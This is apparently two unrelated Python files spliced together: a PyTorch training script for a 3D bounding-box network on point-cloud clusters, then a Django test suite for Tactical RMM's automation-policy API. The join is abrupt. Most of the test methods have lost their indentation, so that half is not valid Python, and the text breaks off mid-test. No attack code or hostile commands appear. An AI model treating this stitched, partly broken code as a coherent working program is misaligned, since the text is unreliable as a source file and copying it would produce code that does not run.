def boxes_to_corners_3d(boxes3d):
    """Convert (N, 7) boxes [x, y, z, dx, dy, dz, heading] to corner points.

        7 -------- 4
       /|         /|
      6 -------- 5 .
      | |        | |
      . 3 -------- 0
      |/         |/
      2 -------- 1

    Args:
        boxes3d: (N, 7) [x, y, z, dx, dy, dz, heading], (x, y, z) is the box center
    Returns:
        corners3d: (N, 8, 3)
    """
    # Unit-cube corner offsets (half-extents), ordered as in the sketch above.
    unit_corners = 0.5 * np.array([
        [1, 1, -1], [1, -1, -1], [-1, -1, -1], [-1, 1, -1],
        [1, 1, 1], [1, -1, 1], [-1, -1, 1], [-1, 1, 1],
    ])
    # Scale by per-box extents, rotate around z by the heading, then translate
    # to the box center.
    scaled = boxes3d[:, None, 3:6] * unit_corners[None, :, :]
    rotated = rotate_points_along_z(scaled, boxes3d[:, 6]).reshape(-1, 8, 3)
    return rotated + boxes3d[:, None, 0:3]
def rotate_points_along_z(points, angle):
    """Rotate each batch of points around the z-axis.

    Args:
        points: (B, N, 3)
        angle: (B,) rotation angle along the z-axis; angle increases x ==> y
    Returns:
        (B, N, 3) rotated points
    """
    c = np.cos(angle)
    s = np.sin(angle)
    one = np.ones_like(angle, dtype=np.float32)
    zero = np.zeros_like(angle, dtype=np.float32)
    # Assemble one (3, 3) rotation matrix per batch entry -> (B, 3, 3).
    rot = np.stack((
        np.stack((c, s, zero), axis=1),
        np.stack((-s, c, zero), axis=1),
        np.stack((zero, zero, one), axis=1),
    ), axis=1)
    # Row-vector convention: p' = p @ R.
    return np.matmul(points, rot)
# ---------------------------------------------------------------------------
# Command-line options
# ---------------------------------------------------------------------------
parser = argparse.ArgumentParser()
parser.add_argument('--batchSize', type=int, default=32, help='input batch size')
parser.add_argument('--num_points', type=int, default=128, help='input size')
parser.add_argument('--workers', type=int, help='number of data loading workers', default=4)
parser.add_argument('--nepoch', type=int, default=250, help='number of epochs to train for')
parser.add_argument('--outf', type=str, default='cls', help='output folder')
parser.add_argument('--model', type=str, default='', help='model path')
parser.add_argument('--dataset', type=str, required=False, help="dataset path")
parser.add_argument('--dataset_type', type=str, default='bbox', help="dataset type bbox|lidar")
opt = parser.parse_args()
print(opt)
# ANSI escape helper to print a word in blue in the console log.
blue = lambda x: '\033[94m' + x + '\033[0m'
opt.manualSeed = random.randint(1, 10000)  # fix seed
print("Random Seed: ", opt.manualSeed)
random.seed(opt.manualSeed)
torch.manual_seed(opt.manualSeed)
# ---------------------------------------------------------------------------
# Datasets and loaders.
# NOTE(review): dataset roots are hard-coded and --dataset is ignored — confirm.
# ---------------------------------------------------------------------------
if opt.dataset_type == 'bbox':
    box_dataset = BoxDataset(
        #root=opt.dataset,
        root='train_unbbox_dataset',
        classification=True,
        npoints=opt.num_points,
        data_augmentation=False)
    test_box_dataset = BoxDataset(
        #root=opt.dataset,
        root='test_unbbox_dataset',
        classification=True,
        split='test',
        npoints=opt.num_points,
        data_augmentation=False)
else:
    exit('wrong dataset type')
box_dataloader = torch.utils.data.DataLoader(
    box_dataset,
    batch_size=opt.batchSize,
    shuffle=True,
    num_workers=int(opt.workers))
testboxdataloader = torch.utils.data.DataLoader(
    test_box_dataset,
    batch_size=opt.batchSize,
    shuffle=True,
    num_workers=int(opt.workers))
print(len(box_dataset), len(test_box_dataset))
num_classes = len(box_dataset.classes)
print('classes', num_classes)
# Create the checkpoint output folder; ignore "already exists".
try:
    os.makedirs(opt.outf)
except OSError:
    pass
# Model, optionally warm-started from a checkpoint.
classifier = BoxNet(n_classes=num_classes, n_channel=3)
if opt.model != '':
    classifier.load_state_dict(torch.load(opt.model))
optimizer = optim.Adam(classifier.parameters(), lr=0.001, betas=(0.9, 0.999),eps=1e-08, weight_decay=0.0)
#scheduler = torch.optim.lr_scheduler.MultiStepLR(optimizer, milestones=20, gamma=0.1)
scheduler = torch.optim.lr_scheduler.StepLR(optimizer, step_size=20, gamma=0.1)
#optimizer = optim.Adam(classifier.parameters(), lr=0.001, betas=(0.9, 0.999))
#scheduler = optim.lr_scheduler.StepLR(optimizer, step_size=20, gamma=0.5)
classifier.cuda()
# NOTE: true division — num_batch is a float, used only for progress printing.
num_batch = len(box_dataset) / opt.batchSize
# ---------------------------------------------------------------------------
# Live loss plot (interactive matplotlib figure updated during training).
# ---------------------------------------------------------------------------
plt.ion()
figure = plt.figure()
ax = figure.add_subplot(111)
idx = []
test_loss = []
train_loss = []
plot1, = ax.plot(idx, test_loss, label='test')
plot2, = ax.plot(idx, train_loss, label='train')
plt.ylim(0, 10)
plt.xlim(0, 158200)
plt.xlabel("i")
plt.ylabel("loss")
plt.legend(loc="lower left")
plt.title("loss-iteration")
# Main training loop: one optimizer step per batch; every 10 batches a single
# test batch is evaluated and the live plot is refreshed.
for epoch in range(opt.nepoch):
    # NOTE(review): scheduler.step() is called before any optimizer.step() in
    # the epoch; recent PyTorch expects optimizer.step() first — confirm intended.
    scheduler.step()
    for i, data in enumerate(box_dataloader, 0):
        points, bbox_target, target, _, dist, cluster_center, voxel = data
        # points are cluster-local; points1 restores world coordinates for viz.
        points1 = points + cluster_center[:, None]
        target = target[:, 0]
        dist = dist[:, None]
        voxel = voxel[:, :, None]
        # transform target scalar to 3x one hot vector
        # NOTE(review): class 2 fills slot 1 and class 1 fills slot 2 — confirm
        # this ordering matches the size-cluster ordering used by size2class2.
        hot1 = torch.zeros(len(data[0]))
        hot1[target == 0] = 1
        hot2 = torch.zeros(len(data[0]))
        hot2[target == 2] = 1
        hot3 = torch.zeros(len(data[0]))
        hot3[target == 1] = 1
        one_hot = torch.vstack((hot1, hot2, hot3))
        one_hot = one_hot.transpose(1, 0)
        points = points.transpose(2, 1)
        points, target, bbox_target, one_hot, dist, cluster_center, voxel = points.cuda(), target.cuda(), bbox_target.cuda(), one_hot.cuda(), dist.cuda().float(), cluster_center.cuda(), voxel.cuda().float()
        optimizer.zero_grad()
        classifier = classifier.train()
        # NN
        box_pred, center_delta = classifier(points, one_hot, dist, voxel)
        center_boxnet, \
        heading_scores, heading_residual_normalized, heading_residual, \
        size_scores, size_residual_normalized, size_residual = \
            parse_output_to_tensors(box_pred)
        #box3d_center = center_boxnet + center_delta
        stage1_center = cluster_center + center_delta # original cluster center in the world
        box3d_center = center_boxnet + stage1_center
        # heading_scores (32, 12) which bin is the heading
        # heading_residual (32, 12) residual angle
        # size_scores (32, 3) which bin is the size
        # size_residual (32, 3, 3) residual size
        '''
        2.Center
        center: torch.Size([32, 3]) torch.float32
        stage1_center: torch.Size([32, 3]) torch.float32
        center_label:[32,3]
        3.Heading
        heading_scores: torch.Size([32, 12]) torch.float32
        heading_residual_normalized: torch.Size([32, 12]) torch.float32
        heading_residual: torch.Size([32, 12]) torch.float32
        heading_class_label:(32)
        heading_residual_label:(32)
        4.Size
        size_scores: torch.Size([32, 8]) torch.float32
        size_residual_normalized: torch.Size([32, 8, 3]) torch.float32
        size_residual: torch.Size([32, 8, 3]) torch.float32
        size_class_label:(32)
        size_residual_label:(32,3)'''
        # compute GT
        # NOTE: bbox_target is shifted to world coordinates in place.
        bbox_target[:,:3] = bbox_target[:,:3] + cluster_center
        box3d_center_label = bbox_target[:,:3]
        angle = bbox_target[:, 6]
        heading_class_label, heading_residual_label = angle2class(angle, NUM_HEADING_BIN)
        size_class_label, size_residual_label = size2class2(bbox_target[:,3:6], target)
        #print(' ')
        #print(heading_class_label)
        #print(heading_scores.data.max(1)[1])
        #print(heading_residual_label)
        #print(heading_residual)
        #print(size_class_label)
        #print(size_scores.data.max(1)[1])
        #print(size_residual_label)
        #scls_onehot = torch.eye(NUM_SIZE_CLUSTER)[size_class_label.long()].cuda() # 32,8
        #scls_onehot_repeat = scls_onehot.view(-1, NUM_SIZE_CLUSTER, 1).repeat(1, 1, 3) # 32,8,3
        #predicted_size_residual = torch.sum( \
        #    size_residual * scls_onehot_repeat.cuda(), dim=1)#32,3
        #print(size_residual_label-predicted_size_residual)
        #print(size_residual_label-size_residual)
        #print(box3d_center_label)
        #print(box3d_center)
        #print(' ')
        # losses
        losses = Loss(box3d_center, box3d_center_label, stage1_center, \
                      heading_scores, heading_residual_normalized, \
                      heading_residual, \
                      heading_class_label, heading_residual_label, \
                      size_scores, size_residual_normalized, \
                      size_residual, \
                      size_class_label, size_residual_label)
        loss = losses['total_loss']
        # accuracy (FIX: flipped box results in IOU = 0 maybe)
        ioubev, iou3dbox = compute_box3d_iou(box3d_center.cpu().detach().numpy(), heading_scores.cpu().detach().numpy(), \
            heading_residual.cpu().detach().numpy(), size_scores.cpu().detach().numpy(), size_residual.cpu().detach().numpy(), \
            box3d_center_label.cpu().detach().numpy(), heading_class_label.cpu().detach().numpy(), \
            heading_residual_label.cpu().detach().numpy(), size_class_label.cpu().detach().numpy(), \
            size_residual_label.cpu().detach().numpy())
        # matplotlib viz
        pred_box_corners = give_pred_box_corners(box3d_center.cpu().detach().numpy(), heading_scores.cpu().detach().numpy(), \
            heading_residual.cpu().detach().numpy(), size_scores.cpu().detach().numpy(), size_residual.cpu().detach().numpy())
        np_bbox_target = bbox_target.cpu().detach().numpy()
        gt_corners = boxes_to_corners_3d(np_bbox_target)
        # Debug visualization — disabled (epoch == -1 never holds during training).
        if i > 0 and epoch == -1:
            for cc in range(32):
                fig = plt.figure()
                ax = fig.add_subplot(111, projection='3d')
                np_points = points1.cpu().detach().numpy()
                pts = np_points[cc]
                gt_b = gt_corners[cc] # (8, 3)
                b = pred_box_corners[cc]
                ax.scatter(pts[:, 0], pts[:, 1], pts[:, 2], s=5, c='b', lw=0, alpha=1)
                for k in range(0, 4):
                    xx = 0
                    yy = 1
                    zz = 2
                    # pred
                    # NOTE(review): this rebinds `i`, clobbering the dataloader
                    # batch index — harmless only while this block stays disabled.
                    i, j = k, (k + 1) % 4
                    ax.plot([b[i, xx], b[j, xx]], [b[i, yy], b[j, yy]], [b[i, zz], b[j, zz]],
                            color='r')
                    i, j = k + 4, (k + 1) % 4 + 4
                    ax.plot([b[i, xx], b[j, xx]], [b[i, yy], b[j, yy]], [b[i, zz], b[j, zz]],
                            color='r')
                    i, j = k, k + 4
                    ax.plot([b[i, xx], b[j, xx]], [b[i, yy], b[j, yy]], [b[i, zz], b[j, zz]],
                            color='r')
                    # gt
                    i, j = k, (k + 1) % 4
                    ax.plot([gt_b[i, xx], gt_b[j, xx]], [gt_b[i, yy], gt_b[j, yy]], [gt_b[i, zz], gt_b[j, zz]],
                            color='g')
                    i, j = k + 4, (k + 1) % 4 + 4
                    ax.plot([gt_b[i, xx], gt_b[j, xx]], [gt_b[i, yy], gt_b[j, yy]], [gt_b[i, zz], gt_b[j, zz]],
                            color='g')
                    i, j = k, k + 4
                    ax.plot([gt_b[i, xx], gt_b[j, xx]], [gt_b[i, yy], gt_b[j, yy]], [gt_b[i, zz], gt_b[j, zz]],
                            color='g')
                #visual_right_scale(corners3d.reshape(-1, 3), ax)
                ax.title.set_text('IOU: {}'.format(iou3dbox[cc]))
                ax.view_init(elev=30., azim=-45)
                ax.set_box_aspect([1,1,1])
                #ax.set_xlim3d(-3, 3)
                #ax.set_ylim3d(-3, 3)
                #ax.set_zlim3d(-3, 3)
                ax.set_xlabel('x')
                ax.set_ylabel('y')
                ax.set_zlabel('z')
                plt.show()
        loss.backward()
        optimizer.step()
        print('[%d: %d/%d] train loss: %f MIOU: %f' % (epoch, i, num_batch, loss.item(), np.mean(iou3dbox)))
        #print('[%d: %d/%d] train loss: %f' % (epoch, i, num_batch, loss.item()))
        loss_train = loss.item()
        # Every 10 batches: evaluate one test batch and refresh the live plot.
        # NOTE(review): no torch.no_grad() here, so the eval forward pass still
        # builds autograd graphs — confirm intended (memory overhead only).
        if i % 10 == 0:
            j, data = next(enumerate(testboxdataloader, 0))
            points, bbox_target, target, _, dist, cluster_center, voxel = data
            points1 = points + cluster_center[:, None]
            target = target[:, 0]
            dist = dist[:, None]
            voxel = voxel[:, :, None]
            # transform target scalar to 3x one hot vector
            hot1 = torch.zeros(len(data[0]))
            hot1[target == 0] = 1
            hot2 = torch.zeros(len(data[0]))
            hot2[target == 2] = 1
            hot3 = torch.zeros(len(data[0]))
            hot3[target == 1] = 1
            one_hot = torch.vstack((hot1, hot2, hot3))
            one_hot = one_hot.transpose(1, 0)
            points = points.transpose(2, 1)
            points, target, bbox_target, one_hot, dist, cluster_center, voxel = points.cuda(), target.cuda(), bbox_target.cuda(), one_hot.cuda(), dist.cuda().float(), cluster_center.cuda(), voxel.cuda().float()
            classifier = classifier.eval()
            # NN
            box_pred, center_delta = classifier(points, one_hot, dist, voxel)
            center_boxnet, \
            heading_scores, heading_residual_normalized, heading_residual, \
            size_scores, size_residual_normalized, size_residual = \
                parse_output_to_tensors(box_pred)
            stage1_center = cluster_center + center_delta # original cluster center in the world
            box3d_center = center_boxnet + stage1_center
            # compute GT, probably wrong setup
            bbox_target[:,:3] = bbox_target[:,:3] + cluster_center
            box3d_center_label = bbox_target[:,:3]
            angle = bbox_target[:, 6] #+ 3/2*np.pi
            heading_class_label, heading_residual_label = angle2class(angle, NUM_HEADING_BIN)
            size_class_label, size_residual_label = size2class2(bbox_target[:,3:6], target)
            # losses
            losses = Loss(box3d_center, box3d_center_label, stage1_center, \
                          heading_scores, heading_residual_normalized, \
                          heading_residual, \
                          heading_class_label, heading_residual_label, \
                          size_scores, size_residual_normalized, \
                          size_residual, \
                          size_class_label, size_residual_label)
            loss = losses['total_loss']
            # accuracy
            ioubev, iou3dbox = compute_box3d_iou(box3d_center.cpu().detach().numpy(), heading_scores.cpu().detach().numpy(), \
                heading_residual.cpu().detach().numpy(), size_scores.cpu().detach().numpy(), size_residual.cpu().detach().numpy(), \
                box3d_center_label.cpu().detach().numpy(), heading_class_label.cpu().detach().numpy(), \
                heading_residual_label.cpu().detach().numpy(), size_class_label.cpu().detach().numpy(), \
                size_residual_label.cpu().detach().numpy())
            # matplotlib viz
            pred_box_corners = give_pred_box_corners(box3d_center.cpu().detach().numpy(), heading_scores.cpu().detach().numpy(), \
                heading_residual.cpu().detach().numpy(), size_scores.cpu().detach().numpy(), size_residual.cpu().detach().numpy())
            np_bbox_target = bbox_target.cpu().detach().numpy()
            gt_corners = boxes_to_corners_3d(np_bbox_target)
            # Debug visualization — disabled (epoch == -1 never holds).
            if i > 0 and epoch == -1:
                for cc in range(32):
                    fig = plt.figure()
                    ax = fig.add_subplot(111, projection='3d')
                    np_points = points1.cpu().detach().numpy()
                    pts = np_points[cc]
                    gt_b = gt_corners[cc] # (8, 3)
                    b = pred_box_corners[cc]
                    ax.scatter(pts[:, 0], pts[:, 1], pts[:, 2], s=5, c='b', lw=0, alpha=1)
                    for k in range(0, 4):
                        xx = 0
                        yy = 1
                        zz = 2
                        # pred
                        i, j = k, (k + 1) % 4
                        ax.plot([b[i, xx], b[j, xx]], [b[i, yy], b[j, yy]], [b[i, zz], b[j, zz]],
                                color='r')
                        i, j = k + 4, (k + 1) % 4 + 4
                        ax.plot([b[i, xx], b[j, xx]], [b[i, yy], b[j, yy]], [b[i, zz], b[j, zz]],
                                color='r')
                        i, j = k, k + 4
                        ax.plot([b[i, xx], b[j, xx]], [b[i, yy], b[j, yy]], [b[i, zz], b[j, zz]],
                                color='r')
                        # gt
                        i, j = k, (k + 1) % 4
                        ax.plot([gt_b[i, xx], gt_b[j, xx]], [gt_b[i, yy], gt_b[j, yy]], [gt_b[i, zz], gt_b[j, zz]],
                                color='g')
                        i, j = k + 4, (k + 1) % 4 + 4
                        ax.plot([gt_b[i, xx], gt_b[j, xx]], [gt_b[i, yy], gt_b[j, yy]], [gt_b[i, zz], gt_b[j, zz]],
                                color='g')
                        i, j = k, k + 4
                        ax.plot([gt_b[i, xx], gt_b[j, xx]], [gt_b[i, yy], gt_b[j, yy]], [gt_b[i, zz], gt_b[j, zz]],
                                color='g')
                    #visual_right_scale(corners3d.reshape(-1, 3), ax)
                    ax.title.set_text('IOU: {}'.format(iou3dbox[cc]))
                    ax.view_init(elev=30., azim=-45)
                    ax.set_box_aspect([1,1,1])
                    #ax.set_xlim3d(-3, 3)
                    #ax.set_ylim3d(-3, 3)
                    #ax.set_zlim3d(-3, 3)
                    ax.set_xlabel('x')
                    ax.set_ylabel('y')
                    ax.set_zlabel('z')
                    plt.show()
            print('[%d: %d/%d] %s loss: %f MIOU: %f' % (epoch, i, num_batch, blue('test'), loss.item(), np.mean(iou3dbox)))
            test_loss.append(loss.item())
            train_loss.append(loss_train)
            #loss_list[epoch*791 + i] = loss.item()
            # NOTE(review): 791 looks like a hard-coded batches-per-epoch count
            # for the plot x-axis — confirm it matches len(box_dataloader).
            idx.append(epoch*791 + i)
            plot1.set_xdata(idx)
            plot1.set_ydata(test_loss)
            plot2.set_xdata(idx)
            plot2.set_ydata(train_loss)
            figure.canvas.draw()
            figure.canvas.flush_events()
            time.sleep(0.01)
    # Checkpoint once per epoch.
    torch.save(classifier.state_dict(), '%s/cls_model_%d.pth' % (opt.outf, epoch))
# Dead code kept for reference: standalone test-set accuracy evaluation loop.
'''total_correct = 0
total_testset = 0
for i,data in tqdm(enumerate(testdataloader, 0)):
    points, target = data
    target = target[:, 0]
    points = points.transpose(2, 1)
    points, target = points.cuda(), target.cuda()
    classifier = classifier.eval()
    pred, _, _, _ = classifier(points)
    pred_choice = pred.data.max(1)[1]
    correct = pred_choice.eq(target.data).cpu().sum()
    total_correct += correct.item()
    total_testset += points.size()[0]
print("final accuracy {}".format(total_correct / float(total_testset)))'''
from unittest.mock import patch
from tacticalrmm.test import TacticalTestCase
from model_bakery import baker, seq
from itertools import cycle
from agents.models import Agent
from winupdate.models import WinUpdatePolicy
from .serializers import (
PolicyTableSerializer,
PolicySerializer,
PolicyTaskStatusSerializer,
AutoTaskPolicySerializer,
PolicyOverviewSerializer,
PolicyCheckStatusSerializer,
PolicyCheckSerializer,
RelatedAgentPolicySerializer,
RelatedSitePolicySerializer,
RelatedClientPolicySerializer,
)
class TestPolicyViews(TacticalTestCase):
    def setUp(self):
        # Log in the test client and create the core settings every test needs.
        self.authenticate()
        self.setup_coresettings()
def test_get_all_policies(self):
url = "/automation/policies/"
policies = baker.make("automation.Policy", _quantity=3)
resp = self.client.get(url, format="json")
serializer = PolicyTableSerializer(policies, many=True)
self.assertEqual(resp.status_code, 200)
self.assertEqual(resp.data, serializer.data)
self.check_not_authenticated("get", url)
def test_get_policy(self):
# returns 404 for invalid policy pk
resp = self.client.get("/automation/policies/500/", format="json")
self.assertEqual(resp.status_code, 404)
policy = baker.make("automation.Policy")
url = f"/automation/policies/{policy.pk}/"
resp = self.client.get(url, format="json")
serializer = PolicySerializer(policy)
self.assertEqual(resp.status_code, 200)
self.assertEqual(resp.data, serializer.data)
self.check_not_authenticated("get", url)
def test_add_policy(self):
url = "/automation/policies/"
data = {
"name": "Test Policy",
"desc": "policy desc",
"active": True,
"enforced": False,
}
resp = self.client.post(url, data, format="json")
self.assertEqual(resp.status_code, 200)
# running again should fail since names are unique
resp = self.client.post(url, data, format="json")
self.assertEqual(resp.status_code, 400)
# create policy with tasks and checks
policy = baker.make("automation.Policy")
self.create_checks(policy=policy)
baker.make("autotasks.AutomatedTask", policy=policy, _quantity=3)
# test copy tasks and checks to another policy
data = {
"name": "Test Copy Policy",
"desc": "policy desc",
"active": True,
"enforced": False,
"copyId": policy.pk,
}
resp = self.client.post(f"/automation/policies/", data, format="json")
self.assertEqual(resp.status_code, 200)
self.assertEqual(policy.autotasks.count(), 3)
self.assertEqual(policy.policychecks.count(), 7)
self.check_not_authenticated("post", url)
@patch("automation.tasks.generate_agent_checks_from_policies_task.delay")
def test_update_policy(self, mock_checks_task):
# returns 404 for invalid policy pk
resp = self.client.put("/automation/policies/500/", format="json")
self.assertEqual(resp.status_code, 404)
policy = baker.make("automation.Policy", active=True, enforced=False)
url = f"/automation/policies/{policy.pk}/"
data = {
"name": "Test Policy Update",
"desc": "policy desc Update",
"active": True,
"enforced": False,
}
resp = self.client.put(url, data, format="json")
self.assertEqual(resp.status_code, 200)
# only called if active or enforced are updated
mock_checks_task.assert_not_called()
data = {
"name": "Test Policy Update",
"desc": "policy desc Update",
"active": False,
"enforced": False,
}
resp = self.client.put(url, data, format="json")
self.assertEqual(resp.status_code, 200)
mock_checks_task.assert_called_with(
policypk=policy.pk, clear=True, create_tasks=True
)
self.check_not_authenticated("put", url)
@patch("automation.tasks.generate_agent_checks_from_policies_task.delay")
@patch("automation.tasks.generate_agent_tasks_from_policies_task.delay")
def test_delete_policy(self, mock_tasks_task, mock_checks_task):
# returns 404 for invalid policy pk
resp = self.client.delete("/automation/policies/500/", format="json")
self.assertEqual(resp.status_code, 404)
policy = baker.make("automation.Policy")
url = f"/automation/policies/{policy.pk}/"
resp = self.client.delete(url, format="json")
self.assertEqual(resp.status_code, 200)
mock_checks_task.assert_called_with(policypk=policy.pk, clear=True)
mock_tasks_task.assert_called_with(policypk=policy.pk, clear=True)
self.check_not_authenticated("delete", url)
def test_get_all_policy_tasks(self):
# returns 404 for invalid policy pk
resp = self.client.get("/automation/500/policyautomatedtasks/", format="json")
self.assertEqual(resp.status_code, 404)
# create policy with tasks
policy = baker.make("automation.Policy")
baker.make("autotasks.AutomatedTask", policy=policy, _quantity=3)
url = f"/automation/{policy.pk}/policyautomatedtasks/"
resp = self.client.get(url, format="json")
serializer = AutoTaskPolicySerializer(policy)
self.assertEqual(resp.status_code, 200)
self.assertEqual(resp.data, serializer.data)
self.assertEqual(len(resp.data), 3)
self.check_not_authenticated("get", url)
def test_get_all_policy_checks(self):
# setup data
policy = baker.make("automation.Policy")
checks = self.create_checks(policy=policy)
url = f"/automation/{policy.pk}/policychecks/"
resp = self.client.get(url, format="json")
serializer = PolicyCheckSerializer(checks, many=True)
self.assertEqual(resp.status_code, 200)
self.assertEqual(resp.data, serializer.data)
self.assertEqual(len(resp.data), 7)
self.check_not_authenticated("get", url)
def test_get_policy_check_status(self):
# set data
agent = baker.make_recipe("agents.agent")
policy = baker.make("automation.Policy")
policy_diskcheck = baker.make_recipe("checks.diskspace_check", policy=policy)
managed_check = baker.make_recipe(
"checks.diskspace_check",
agent=agent,
managed_by_policy=True,
parent_check=policy_diskcheck.pk,
)
url = f"/automation/policycheckstatus/{policy_diskcheck.pk}/check/"
resp = self.client.patch(url, format="json")
serializer = PolicyCheckStatusSerializer([managed_check], many=True)
self.assertEqual(resp.status_code, 200)
self.assertEqual(resp.data, serializer.data)
self.check_not_authenticated("patch", url)
def test_policy_overview(self):
from clients.models import Client
url = "/automation/policies/overview/"
policies = baker.make(
"automation.Policy", active=cycle([True, False]), _quantity=5
)
clients = baker.make(
"clients.Client",
server_policy=cycle(policies),
workstation_policy=cycle(policies),
_quantity=5,
)
baker.make(
"clients.Site",
client=cycle(clients),
server_policy=cycle(policies),
workstation_policy=cycle(policies),
_quantity=4,
)
baker.make("clients.Site", client=cycle(clients), _quantity=3)
resp = self.client.get(url, format="json")
clients = Client.objects.all()
serializer = PolicyOverviewSerializer(clients, many=True)
self.assertEqual(resp.status_code, 200)
self.assertEqual(resp.data, serializer.data)
self.check_not_authenticated("get", url)
def test_get_related(self):
policy = baker.make("automation.Policy")
url = f"/automation/policies/{policy.pk}/related/"
resp = self.client.get(url, format="json")
self.assertEqual(resp.status_code, 200)
self.assertIsInstance(resp.data["server_clients"], list)
self.assertIsInstance(resp.data["workstation_clients"], list)
self.assertIsInstance(resp.data["server_sites"], list)
self.assertIsInstance(resp.data["workstation_sites"], list)
self.assertIsInstance(resp.data["agents"], list)
self.check_not_authenticated("get", url)
    @patch("agents.models.Agent.generate_checks_from_policies")
    @patch("automation.tasks.generate_agent_checks_by_location_task.delay")
    def test_update_policy_add(
        self,
        mock_checks_location_task,
        mock_checks_task,
    ):
        """Assigning and clearing policies on client/site/agent triggers check
        regeneration only when the relation actually changes.

        Order matters throughout: each POST is immediately followed by mock
        assertions, and each mock is reset before the next relation change.
        """
        url = f"/automation/related/"
        # data setup
        policy = baker.make("automation.Policy")
        client = baker.make("clients.Client")
        site = baker.make("clients.Site", client=client)
        agent = baker.make_recipe("agents.agent", site=site)
        # test add client to policy data
        client_server_payload = {
            "type": "client",
            "pk": agent.client.pk,
            "server_policy": policy.pk,
        }
        client_workstation_payload = {
            "type": "client",
            "pk": agent.client.pk,
            "workstation_policy": policy.pk,
        }
        # test add site to policy data
        site_server_payload = {
            "type": "site",
            "pk": agent.site.pk,
            "server_policy": policy.pk,
        }
        site_workstation_payload = {
            "type": "site",
            "pk": agent.site.pk,
            "workstation_policy": policy.pk,
        }
        # test add agent to policy data
        agent_payload = {"type": "agent", "pk": agent.pk, "policy": policy.pk}
        # test client server policy add
        resp = self.client.post(url, client_server_payload, format="json")
        self.assertEqual(resp.status_code, 200)
        # called because the relation changed
        mock_checks_location_task.assert_called_with(
            location={"site__client_id": client.id},
            mon_type="server",
            clear=True,
            create_tasks=True,
        )
        mock_checks_location_task.reset_mock()
        # test client workstation policy add
        resp = self.client.post(url, client_workstation_payload, format="json")
        self.assertEqual(resp.status_code, 200)
        # called because the relation changed
        mock_checks_location_task.assert_called_with(
            location={"site__client_id": client.id},
            mon_type="workstation",
            clear=True,
            create_tasks=True,
        )
        mock_checks_location_task.reset_mock()
        # test site add server policy
        resp = self.client.post(url, site_server_payload, format="json")
        self.assertEqual(resp.status_code, 200)
        # called because the relation changed
        mock_checks_location_task.assert_called_with(
            location={"site_id": site.id},
            mon_type="server",
            clear=True,
            create_tasks=True,
        )
        mock_checks_location_task.reset_mock()
        # test site add workstation policy
        resp = self.client.post(url, site_workstation_payload, format="json")
        self.assertEqual(resp.status_code, 200)
        # called because the relation changed
        mock_checks_location_task.assert_called_with(
            location={"site_id": site.id},
            mon_type="workstation",
            clear=True,
            create_tasks=True,
        )
        mock_checks_location_task.reset_mock()
        # test agent add
        resp = self.client.post(url, agent_payload, format="json")
        self.assertEqual(resp.status_code, 200)
        # called because the relation changed
        mock_checks_task.assert_called_with(clear=True)
        mock_checks_task.reset_mock()
        # Adding the same relations shouldn't trigger mocks
        resp = self.client.post(url, client_server_payload, format="json")
        self.assertEqual(resp.status_code, 200)
        resp = self.client.post(url, client_workstation_payload, format="json")
        self.assertEqual(resp.status_code, 200)
        mock_checks_location_task.assert_not_called()
        resp = self.client.post(url, site_server_payload, format="json")
        self.assertEqual(resp.status_code, 200)
        resp = self.client.post(url, site_workstation_payload, format="json")
        self.assertEqual(resp.status_code, 200)
        mock_checks_location_task.assert_not_called()
        resp = self.client.post(url, agent_payload, format="json")
        self.assertEqual(resp.status_code, 200)
        # called because the relation changed
        mock_checks_task.assert_not_called()
        # test remove client from policy data
        # NOTE: pk 0 in the payload clears the relation.
        client_server_payload = {"type": "client", "pk": client.pk, "server_policy": 0}
        client_workstation_payload = {
            "type": "client",
            "pk": client.pk,
            "workstation_policy": 0,
        }
        # test remove site from policy data
        site_server_payload = {"type": "site", "pk": site.pk, "server_policy": 0}
        site_workstation_payload = {
            "type": "site",
            "pk": site.pk,
            "workstation_policy": 0,
        }
        # test remove agent from policy
        agent_payload = {"type": "agent", "pk": agent.pk, "policy": 0}
        # test client server policy remove
        resp = self.client.post(url, client_server_payload, format="json")
        self.assertEqual(resp.status_code, 200)
        # called because the relation changed
        mock_checks_location_task.assert_called_with(
            location={"site__client_id": client.id},
            mon_type="server",
            clear=True,
            create_tasks=True,
        )
        mock_checks_location_task.reset_mock()
        # test client workstation policy remove
        resp = self.client.post(url, client_workstation_payload, format="json")
        self.assertEqual(resp.status_code, 200)
        # called because the relation changed
        mock_checks_location_task.assert_called_with(
            location={"site__client_id": client.id},
            mon_type="workstation",
            clear=True,
            create_tasks=True,
        )
        mock_checks_location_task.reset_mock()
        # test site remove server policy
        resp = self.client.post(url, site_server_payload, format="json")
        self.assertEqual(resp.status_code, 200)
        # called because the relation changed
        mock_checks_location_task.assert_called_with(
            location={"site_id": site.id},
            mon_type="server",
            clear=True,
            create_tasks=True,
        )
        mock_checks_location_task.reset_mock()
        # test site remove workstation policy
        resp = self.client.post(url, site_workstation_payload, format="json")
        self.assertEqual(resp.status_code, 200)
        # called because the relation changed
        mock_checks_location_task.assert_called_with(
            location={"site_id": site.id},
            mon_type="workstation",
            clear=True,
            create_tasks=True,
        )
        mock_checks_location_task.reset_mock()
        # test agent remove
        resp = self.client.post(url, agent_payload, format="json")
        self.assertEqual(resp.status_code, 200)
        # called because the relation changed
        mock_checks_task.assert_called_with(clear=True)
        mock_checks_task.reset_mock()
        # adding the same relations shouldn't trigger mocks
        resp = self.client.post(url, client_server_payload, format="json")
        self.assertEqual(resp.status_code, 200)
        resp = self.client.post(url, client_workstation_payload, format="json")
        self.assertEqual(resp.status_code, 200)
        # shouldn't be called since nothing changed
        mock_checks_location_task.assert_not_called()
        resp = self.client.post(url, site_server_payload, format="json")
        self.assertEqual(resp.status_code, 200)
        resp = self.client.post(url, site_workstation_payload, format="json")
        self.assertEqual(resp.status_code, 200)
        # shouldn't be called since nothing changed
        mock_checks_location_task.assert_not_called()
        resp = self.client.post(url, agent_payload, format="json")
        self.assertEqual(resp.status_code, 200)
        # shouldn't be called since nothing changed
        mock_checks_task.assert_not_called()
        self.check_not_authenticated("post", url)
def test_get_relation_by_type(self):
url = f"/automation/related/"
# data setup
policy = baker.make("automation.Policy")
client = baker.make("clients.Client", workstation_policy=policy)
site = baker.make("clients.Site", server_policy=policy)
agent = baker.make_recipe("agents.agent", site=site, policy=policy)
client_payload = {"type": "client", "pk": client.pk}
# test add site to policy
site_payload = {"type": "site", "pk": site.pk}
# test add agent to policy
agent_payload = {"type": "agent", "pk": agent.pk}
# test client relation get
serializer = RelatedClientPolicySerializer(client)
resp = self.client.patch(url, client_payload, format="json")
self.assertEqual(resp.status_code, 200)
self.assertEqual(resp.data, serializer.data)
# test site relation get
